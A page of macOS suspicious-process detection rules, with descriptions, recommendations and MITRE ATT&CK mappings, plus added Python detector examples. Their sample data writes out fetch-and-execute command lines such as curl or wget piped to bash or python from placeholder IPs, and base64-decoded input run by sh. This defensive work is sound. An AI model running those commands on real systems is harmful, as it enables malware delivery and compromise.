Mac Suspicious Process

These detections identify suspicious activity from process start records collected by the Insight Agent from macOS endpoints.

Attacker Technique - Curl Or WGet To External IP Reporting Server IP In URL

Description

This detection identifies the 'curl' or 'wget' utility being used to access a web server at a remote IP address while reporting the IP address of the vulnerable system in the URL. Malicious actors use utilities such as these to call back to systems they have access to in order to validate which systems the attack was successful against.

Recommendation

Examine the IP address that is being contacted. Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105

Attacker Technique - Curl or Wget To Public IP Address With Non Standard Port

Description

This detection identifies the 'curl' or 'wget' utility being used to access a web server at a remote IP address on a non-standard port. Malicious actors often use utilities such as these to download additional payloads after gaining access to a target resource.

Recommendation

Examine the IP address that is being contacted. Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
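The two curl/wget detections above both hinge on parsing the URL out of the command line and classifying its host and port. The following is an added example written for this page, not Rapid7's rule logic; the record fields ("host_ip", "cmdline"), the sample events, and the definition of "external" as anything outside RFC 1918, loopback and link-local space are all assumptions.

```python
import ipaddress
import os
import re
import shlex
from urllib.parse import urlsplit

# Constructed sample process-start records. The field names "host_ip" (the
# endpoint's own address) and "cmdline" are assumptions, not the agent's schema.
SAMPLE_EVENTS = [
    {"host_ip": "10.20.30.40", "cmdline": "curl http://203.0.113.7/report?ip=10.20.30.40"},
    {"host_ip": "10.20.30.40", "cmdline": "wget -q -O /tmp/s2 http://203.0.113.7:8443/stage2"},
    {"host_ip": "10.20.30.40", "cmdline": "curl -s https://203.0.113.9/update"},
    {"host_ip": "10.20.30.40", "cmdline": "curl -fsSL https://packages.example.com/install.sh"},
    {"host_ip": "10.20.30.40", "cmdline": "/usr/bin/curl http://10.0.0.5:9000/health"},
]

# Assumption: "external" means outside these internal ranges. Documentation
# ranges such as 203.0.113.0/24 therefore count as external in the samples.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]
STANDARD_PORTS = {"http": 80, "https": 443}
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def extract_urls(cmdline):
    """Return URL-looking arguments if the command is curl or wget, else []."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:           # unbalanced quotes: fall back to whitespace split
        argv = cmdline.split()
    if not argv or os.path.basename(argv[0]) not in ("curl", "wget"):
        return []
    return [a for a in argv[1:] if URL_RE.match(a)]


def external_ip(host):
    """Return the address if host is a literal IP outside INTERNAL_NETS, else None."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:           # a hostname, not a literal address
        return None
    return None if any(ip in net for net in INTERNAL_NETS) else ip


def analyze(event):
    """Return the sorted list of findings for one process-start record."""
    findings = set()
    for url in extract_urls(event["cmdline"]):
        parts = urlsplit(url)
        if external_ip(parts.hostname or "") is None:
            continue
        port = parts.port or STANDARD_PORTS.get(parts.scheme.lower())
        if port not in STANDARD_PORTS.values():
            findings.add("external_ip_nonstandard_port")
        # The endpoint's own address appearing in the path or query is the
        # "reporting server IP in URL" pattern.
        if event["host_ip"] in (parts.path + "?" + parts.query):
            findings.add("own_ip_in_url")
    return sorted(findings)


def scan(events):
    """Return (cmdline, findings) for every record with at least one finding."""
    return [(e["cmdline"], analyze(e)) for e in events if analyze(e)]


if __name__ == "__main__":
    for cmdline, findings in scan(SAMPLE_EVENTS):
        print(findings, cmdline)
```

Only literal IP hosts are considered, which is what keeps ordinary package-manager and vendor-update traffic to hostnames out of the results; the port check treats the scheme default as standard, so an explicit `:443` on an https URL is not flagged.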

Attacker Tools - Cobalt Strike Client Application - Mac

Description

This indicator is designed to detect the usage of the penetration testing/post-exploitation framework Cobalt Strike. This indicator is specific to Mac operating systems.

Recommendation

Investigate the process events to identify if this activity is authorized and expected within the client network.

MITRE ATT&CK Techniques

  • Obtain Capabilities - T1588

Attacker Tools - Cobalt Strike Client Update - Mac

Description

This indicator is designed to detect the usage of the penetration testing/post-exploitation framework Cobalt Strike. This indicator is specific to Mac operating systems.

Recommendation

Investigate the process events to identify if this activity is authorized and expected within the client network.

MITRE ATT&CK Techniques

  • Obtain Capabilities - T1588

macOS Suspicious Process - chmod & nohup

Description

This detection identifies chmod being executed, followed by the same file being executed with nohup, in the same command line. This has been observed in macOS malware, notably the Shlayer malware, as a method of execution.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Unix Shell - T1059.004
  • File and Directory Permissions Modification - T1222
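The detection above is about correlation within one command line: the file chmod operates on is the file nohup later runs. Below is an added example of that correlation, written for this page and not taken from Rapid7's rule; the sample command lines and paths are constructed, and the quoting-unaware split on `&&`, `||` and `;` is a deliberate simplification for triage.

```python
import os
import re
import shlex

# Constructed sample command lines; the paths are made up for illustration.
SAMPLE_CMDLINES = [
    "chmod +x /tmp/.hidden/payload && nohup /tmp/.hidden/payload > /dev/null 2>&1 &",
    "chmod 755 /Users/Shared/.u/run.sh; nohup sh /Users/Shared/.u/run.sh &",
    "chmod 644 /Users/alice/notes.txt; ls -la /Users/alice",
    "nohup /usr/local/bin/backup.sh &",
]

# Split on the list operators &&, || and ; (quoting is not honoured here).
LIST_SEPARATOR_RE = re.compile(r"\s*(?:&&|\|\||;)\s*")


def split_commands(cmdline):
    """Return the simple commands of a shell list, in execution order."""
    return [seg for seg in LIST_SEPARATOR_RE.split(cmdline) if seg.strip()]


def argv_of(segment):
    try:
        return shlex.split(segment)
    except ValueError:           # unbalanced quotes: fall back to whitespace split
        return segment.split()


def chmod_targets(argv):
    """Files named in a chmod invocation: chmod [options] MODE FILE..."""
    if not argv or os.path.basename(argv[0]) != "chmod":
        return set()
    # Drop option flags; the first remaining word is the mode. A symbolic mode
    # such as -x that itself starts with '-' would be dropped too (known limitation).
    positional = [a for a in argv[1:] if not a.startswith("-")]
    return set(positional[1:])


def detect_chmod_nohup(cmdline):
    """Return the path that was chmod'ed and then run under nohup, or None."""
    made_executable = set()
    for segment in split_commands(cmdline):
        argv = argv_of(segment)
        made_executable |= chmod_targets(argv)
        if argv and os.path.basename(argv[0]) == "nohup":
            # Match any nohup argument, so 'nohup sh FILE' is caught as well as 'nohup FILE'.
            hits = made_executable & set(argv[1:])
            if hits:
                return sorted(hits)[0]
    return None


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(detect_chmod_nohup(cmd), "<-", cmd)
```

Requiring the same path on both sides is what separates this from the many benign scripts that happen to contain a chmod and an unrelated nohup; the third and fourth samples produce no hit for exactly that reason.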

macOS Suspicious Process - Killall Terminal

Description

This detection identifies the killall command being used to kill any instances of the macOS Terminal that are running. This may be done to stop an earlier stage of the malware from continuing to execute, or as an anti-analysis technique.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Disable or Modify Tools - T1562.001

macOS Suspicious Process - Tail Piping to Funzip

Description

This detection identifies the 'tail -c' command being used to output a specified number of bytes from a file, with that output then piped to the 'funzip' utility to decompress the data. This has been observed in macOS malware that hides a zipped binary at the end of a bash script, uses tail to output only the zip portion of the script file, decompresses it, and executes it.

Recommendation

Investigate the file that the 'tail' command is being used on. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Deobfuscate/Decode Files or Information - T1140

Malicious Document - Microsoft Office for macOS spawns curl

Description

Crafted malicious documents targeting macOS have been observed using curl to download a second-stage payload from a remote server.

Additional information can be found at: https://labs.sentinelone.com/lazarus-apt-targets-mac-users-poisoned-word-document/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
  • Spearphishing Attachment - T1598.002

Malicious Document - Microsoft Office for macOS spawns Python

Description

This detection identifies Microsoft Office for macOS launching Python. Crafted malicious documents targeting macOS have been observed using Python to execute malicious code.

Recommendation

Examine the code passed to the Python process, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Python - T1059.006
  • Spearphishing Attachment - T1598.002

Malicious Document - Word for macOS spawns perl

Description

This detection identifies Word spawning perl. This has been observed in use by malicious documents targeting macOS from attacker groups including Ocean Lotus (APT32).

Recommendation

Examine the commands being passed to Perl, and any process that Perl may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002

Malicious Document - Word for macOS spawns shell

Description

This detection identifies Word spawning sh, bash, or zsh. This has been observed in use by malicious documents targeting macOS from malicious groups including Ocean Lotus (APT32).

Recommendation

Determine what is being executed by the shell. Examine any processes spawned by Word. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002

Malicious Document - Word or Excel for macOS opens slk file

Description

.slk files are a symbolic link format that dates back to Microsoft DOS. They are still supported in Office products, and can be used by a malicious actor to deliver macros that will be opened by Microsoft Word or Excel.

Recommendation

Examine any processes launched by Word or Excel, and any process that those processes may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002

Suspicious MacOS Process - launchd starts Archive Utility

Description

To bypass defenses around creating launch agents, a malicious actor can create a login item that points to a zip file in ~/Library containing a folder named LaunchAgents, which in turn contains a launch agent plist file. Since this is neither a script nor an executable, the operating system allows it, and the archive is opened using the default handler on login. The default macOS Archive Utility, which is trusted by the operating system, opens the archive and writes the plist file it contains to ~/Library/LaunchAgents, which is normally not writable by unprivileged users or untrusted binaries. This causes whatever is specified in the plist file to launch at next login.

Additional information can be found at https://objective-see.com/blog/blog_0x4B.html

Recommendation

Inspect the created plist file. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Launchctl - T1569.001
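When this detection fires, the artifact worth inspecting is the archive itself: does it expand into a LaunchAgents folder, and what would the plist inside it launch? The following is an added example for this page, not Rapid7's code, that builds a constructed archive shaped like the one described above and then lists every launch agent plist it would drop, together with the program it points at. The label and program path in the sample are made up.

```python
import io
import plistlib
import posixpath
import zipfile


def build_sample_archive():
    """Constructed sample: a zip carrying a launch agent plist under LaunchAgents/."""
    agent = {
        "Label": "com.example.updater",                       # made-up label
        "ProgramArguments": ["/Users/Shared/.update/helper", "--quiet"],  # made-up path
        "RunAtLoad": True,
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("LaunchAgents/com.example.updater.plist", plistlib.dumps(agent))
        zf.writestr("README.txt", b"nothing to see here")
    return buf.getvalue()


def launch_agent_entries(zip_bytes):
    """Summarise every plist the archive would expand into a LaunchAgents folder."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Normalise the member path so '../' tricks and odd separators do not hide the folder.
            parts = posixpath.normpath(info.filename).split("/")
            if "LaunchAgents" not in parts[:-1] or not parts[-1].endswith(".plist"):
                continue
            try:
                plist = plistlib.loads(zf.read(info))
            except Exception:          # not a parseable plist; still worth reporting
                plist = {}
            # A launch agent names its target via ProgramArguments or Program.
            program = plist.get("ProgramArguments") or [plist.get("Program")]
            findings.append({
                "entry": info.filename,
                "label": plist.get("Label"),
                "program": program[0],
                "run_at_load": bool(plist.get("RunAtLoad", False)),
            })
    return findings


if __name__ == "__main__":
    for entry in launch_agent_entries(build_sample_archive()):
        print(entry)
```

To triage a real host, read the zip the login item points at (the path in ~/Library from the login item, or from the Archive Utility process record) and pass its bytes to `launch_agent_entries`; the `program` value is the binary that would run at next login and the first thing to examine.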

Suspicious Process - base64 Output Piped to Shell

Description

This detection identifies the base64 utility being used to decode base64-encoded command line arguments before passing them on to a shell process such as bash for execution. Malicious actors may use base64 encoded payloads to avoid detection.

Recommendation

Investigate the contents of the base64 encoded string. Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Deobfuscate/Decode Files or Information - T1140

Suspicious Process - Curl Downloading From Cloudfront URL

Description

This detection identifies the 'curl' command being used to download data from a CloudFront URL. Malicious actors have been observed using 'curl' to download second stage payloads from CloudFront.

Recommendation

Investigate the contents of the CloudFront URL. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Web Service - T1102
  • Ingress Tool Transfer - T1105

Suspicious Process - Curl or WGet Pipes Output to Shell

Description

This detection identifies output from the Curl or WGet utility being piped to bash or another shell process. Malicious actors may use Curl or WGet to download additional malware, and pipe that malware to a shell for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the shell process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Unix Shell - T1059.004
  • Ingress Tool Transfer - T1105

Suspicious Process - Curl Output Piped to Perl

Description

This detection identifies output from the Curl utility being piped to Perl. Malicious actors may use Curl to download additional malware, and pipe that malware to Perl for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105

Suspicious Process - Curl Output Piped to Python

Description

This detection identifies output from the Curl utility being piped to Python. Malicious actors may use Curl to download additional malware, and pipe that malware to Python for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Python - T1059.006
  • Ingress Tool Transfer - T1105

Suspicious Process - curl --upload-file

Description

Malware has been observed using the curl --upload-file command with no specified username to exfiltrate data to an attacker-controlled server.

This activity has specifically been identified in the CookieMiner malware for macOS: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041
  • Exfiltration Over Web Service - T1567

Suspicious Process - DazzleSpy Process Name

Description

This detection identifies execution of a binary named 'softwareupdate' from a '.local' directory. This is associated with the DazzleSpy family of malware.

Recommendation

Examine the binary in question. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Masquerading - T1036
  • Signed Binary Proxy Execution - T1218

Suspicious Process - Grepping Shell History

Description

This detection identifies the Grep command being used to search the contents of the shell history file. A malicious actor may do this in order to identify sensitive information such as passwords, or targets for lateral movement.

Recommendation

Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Bash History - T1552.003

Suspicious Process - macOS Curl -f0l

Description

This detection identifies Curl being used with the -f0l flags on macOS. Use of Curl with this combination of flags is indicative of the Shlayer malware.

Recommendation

Investigate the host that was contacted, and any files downloaded from it. Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Web Protocols - T1071.001
  • Ingress Tool Transfer - T1105

Suspicious Process - macOS Decoding File with OpenSSL Base64

Description

This detection identifies OpenSSL being used to decode base64 payloads on a macOS system. This may be done by malware that targets macOS in order to decode obfuscated payloads.

Recommendation

Attempt to decode and review the base64-encoded string or file. Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Deobfuscate/Decode Files or Information - T1140

Suspicious Process - macOS UpdateAgent Curl Command Pattern

Description

This detection identifies the pattern '--connect-timeout 900' in a Curl command. This specific pattern has been observed in the UpdateAgent macOS malware. Additional details can be found from Microsoft: https://twitter.com/MsftSecIntel/status/1451279679059488773

Recommendation

Investigate the domain being contacted in the Curl command. Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105

Suspicious Process - Office for macOS Launching OSAScript

Description

This detection identifies Microsoft Office processes launching OSAScript. OSAScript is a command line utility for executing AppleScript, which attackers may use for malicious purposes.

Recommendation

Attempt to identify the document that caused this activity to occur. Investigate the contents of the AppleScript being run. Examine any processes that may have been launched by OSAScript. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • AppleScript - T1059.002
  • Spearphishing Attachment - T1566.001

Suspicious Process - Silver Sparrow Filenames

Description

This detection identifies filenames known to be used by the Silver Sparrow malware for macOS.

More information can be found at https://redcanary.com/blog/clipping-silver-sparrows-wings/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

Suspicious Process - SysJoker Process Names

Description

This detection identifies process names known to be used by the SysJoker malware family. SysJoker is a multi-platform backdoor that masquerades as a system update.

Recommendation

Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Masquerading - T1036

Suspicious Process - Viewing or Deleting macOS Quarantine Events

Description

This detection identifies SQL being used to read the contents of the macOS quarantine events database. Malicious programs have been observed doing this in order to view the URL they were downloaded from.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

Suspicious Process - WGet Output Piped to Bash

Description

This detection identifies output from the WGet utility being piped to bash or another shell process. Malicious actors may use WGet to download additional malware, and pipe that malware to bash for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the bash process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105

Suspicious Process - Wget Output Piped to Perl

Description

This detection identifies output from the WGet utility being piped to Perl. Malicious actors may use WGet to download additional malware, and pipe that malware to Perl for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105

Suspicious Process - WGet Output Piped to Python

Description

This detection identifies output from the WGet utility being piped to Python. Malicious actors may use WGet to download additional malware, and pipe that malware to Python for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
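Several detections on this page share one shape: a stage that fetches or decodes content (curl, wget, base64 -d, openssl base64 -d, tail -c) is piped into a stage that runs it (sh, bash, zsh, perl, python) or unpacks it (funzip). This covers the "Curl or WGet Pipes Output to Shell", "Curl/WGet Output Piped to Perl/Python", "base64 Output Piped to Shell", "macOS Decoding File with OpenSSL Base64" and "Tail Piping to Funzip" detections. The following is an added example for this page, not Rapid7's rule logic, that generalises them into one pipeline classifier; the stage vocabularies and the sample command lines (addresses and paths made up) are assumptions, and the split on `|` ignores quoting.

```python
import os
import re
import shlex

# Stage vocabularies; these sets are assumptions modelled on the detections on this page.
FETCHERS = {"curl", "wget"}
SINKS = {"sh", "bash", "zsh", "perl", "python", "python3", "funzip"}

# Constructed sample command lines (addresses and paths are made up).
SAMPLE_CMDLINES = [
    "curl -fsSL http://198.51.100.4/a.sh | bash",
    "wget -qO- http://198.51.100.4/p.py | python3 -",
    "echo ZWNobyBoaQ== | base64 -d | sh",
    "tail -c 2097 /tmp/installer.sh | funzip > /tmp/bin",
    "openssl base64 -d -in /tmp/blob | zsh",
    "cat /var/log/system.log | grep -c error",
    "base64 /tmp/report.pdf | mail alice",
    "curl -s https://api.example.com/v1/status | jq .",
]

PIPE_RE = re.compile(r"(?<!\|)\|(?!\|)")   # a single '|', not the '||' operator


def split_pipeline(cmdline):
    """Return the stages of a pipeline, left to right."""
    return [s.strip() for s in PIPE_RE.split(cmdline) if s.strip()]


def argv_of(segment):
    try:
        return shlex.split(segment)
    except ValueError:           # unbalanced quotes: fall back to whitespace split
        return segment.split()


def is_decoder(argv):
    """True when the stage turns encoded or embedded data back into something runnable."""
    prog = os.path.basename(argv[0]) if argv else ""
    opts = set(argv[1:])
    if prog == "base64":
        return bool(opts & {"-d", "-D", "--decode"})
    if prog == "openssl":
        return "-d" in opts and bool(opts & {"base64", "-base64", "-a"})
    if prog == "tail":
        # 'tail -c N' or 'tail -cN' / 'tail -c+N': a byte-offset slice of a file
        return any(a == "-c" or (a.startswith("-c") and a[2:].lstrip("+").isdigit())
                   for a in argv[1:])
    return False


def classify(cmdline):
    """Return 'source->sink' when a fetch/decode stage feeds an execution stage, else None."""
    stages = [argv_of(s) for s in split_pipeline(cmdline)]
    progs = [os.path.basename(a[0]) if a else "" for a in stages]
    for i, argv in enumerate(stages):
        if progs[i] in FETCHERS or is_decoder(argv):
            for later in progs[i + 1:]:
                if later in SINKS:
                    return f"{progs[i]}->{later}"
    return None


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(classify(cmd), "<-", cmd)
```

Because the sink may sit anywhere to the right of the source, `echo ... | base64 -d | sh` is classified on the base64 stage rather than the echo, and a fetch whose output goes to jq, grep or mail is left alone. The `source->sink` label is a convenient pivot for the recommendation on each of these detections: the source stage carries the URL or file to investigate and the sink stage is the process whose children should be examined.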